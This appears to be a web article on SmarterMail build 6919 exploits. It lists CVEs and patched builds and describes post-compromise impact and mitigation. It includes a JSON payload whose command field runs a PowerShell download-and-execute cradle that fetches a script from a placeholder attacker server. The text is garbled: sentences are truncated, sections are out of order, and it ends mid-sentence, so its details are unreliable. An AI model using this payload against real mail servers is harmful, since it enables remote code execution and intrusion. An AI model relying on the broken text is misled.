Smartermail 6919 Exploit


SmarterTools released to address this. The fix involved:

In February 2022, the first in-the-wild attacks were observed, deploying webshells and cryptominers. Shodan scans at the time revealed over 12,000 exposed SmarterMail instances, many unpatched.

Attackers can use the compromised server as a pivot point to attack other internal networks.

If an emergency patch cannot be immediately deployed due to system dependencies, network administrators must block external traffic to the remoting infrastructure:

With system-level rights, malicious actors can manipulate registry keys, drop secondary payloads (such as web shells or ransomware), dump Active Directory credentials from memory, and use the server as an internal launching pad to pivot laterally across the corporate enterprise network.

Because the backend service handles these administrative endpoints with high privileges, successful execution occurs under the context. This grants full administrative control over the underlying Windows host machine.

Impact of System Compromise

| Date | Vulnerability | Build Affected | Patch |
|------|---------------|----------------|-------|
| August 2019 | CVE-2019-7211, CVE-2019-7212, CVE-2019-7213, CVE-2019-7214 | Build < 6985 (including ) | Build 6985 |
| October 2025 | CVE-2025-52691 (File Upload RCE) | Build 9406 and earlier | Build 9413 |
| January 15, 2026 | CVE-2026-23760 (Auth Bypass) | Build < 9511 | Build 9511 |
| January 15, 2026 | CVE-2026-24423 (ConnectToHub RCE) | Build < 9511 | Build 9511 |

```json
{
  "MountPath": "/temp",
  "commandMount": "powershell.exe -c IEX(New-Object Net.WebClient).DownloadString('http://attacker-server/payload.ps1')"
}
```

An attacker could send a crafted POST request to ExecuteCommand with a Command value like: